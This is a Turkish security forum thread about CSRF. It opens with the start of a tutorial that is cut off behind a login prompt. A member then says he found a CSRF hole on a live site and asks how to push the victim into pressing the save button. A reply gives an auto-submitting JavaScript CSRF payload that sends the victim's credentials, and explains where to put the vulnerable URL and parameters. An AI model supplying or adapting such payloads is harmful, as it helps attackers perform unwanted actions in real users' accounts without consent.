Her Yönüyle CSRF Açığı

Ozan

Üye
Herkese merhabalar. Bu yazımda CSRF olayını ele alacam. Konuyu her yönüyle baya uzun bir şekilde anlatacam. İyi okumalar…:)
Bu yazıda; Siteler Arası İstek Sahteciliği’nin (CSRF) ne olduğu hakkında konuşacak, birisinin başarılı bir CSRF saldırısı yapmasını ve CSRF saldırısını nasıl güçlendireceğini açıklamaya çalışacaz (örneğin, CSRF’yi diğer güvenlik açıklarıyla birleştirme). CSRF, bir son kullanıcıyı, halihazırda kimliği doğrulanmış olduğu bir web uygulamasında istenmeyen eylemler...
İçeriğin tamamını görüntüleyebilmeniz için foruma üye olmanız gerekmektedir. Giriş yap veya üye ol.
 
Moderatör tarafında düzenlendi:

ozanpy

Üye
Merhabalar dün bir sitede csrf ararken. Csrf HTML formunu aldım.başka bir tarayıcıda başka bir hesapta çalışıyordım. Yeni.bilgiler kurban olan hesaptaki inputlara geldi. Ama aşağıda bir adet daha save butonu var. Ona basmadan kayıt edilmeyecek. Kurbanı o butona basmaya itersem csrf başarılı olacak. Bunun bir yolu var mı? Veya açıktan sayılır mı? Save butonuna bassa kusursuz bis csrf açığı Mevcut.
 
Son düzenleme:
Kod:
<script>
var http = new XMLHttpRequest();
var url = 'https://example.com/';
var params = 'params=value';
http.open('POST', url, true);
http.withCredentials = true;
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');

http.send(params);
</script>
bu sekilde de halledebilirsin. butonsuz hali
 

ozanpy

Üye
Tam olarak ne işe yaradığını açıklayabilir misin ne yapar bu? Bir de değiştirmem gereken alanlar nedir?
 
aslında yukarı tam olarak ne dedigini anlayamadım ama;

bu kodlar butona basmadan hedef siteye otomatik istek göndermeni sağlıyor.

var url = 'https://example.com/';
bu kısma csrf zafiyetine sahip urlyi gireceksin
var params = 'params=value';
buraya da parametreleri ve degerlerini gireceksin
 
Üst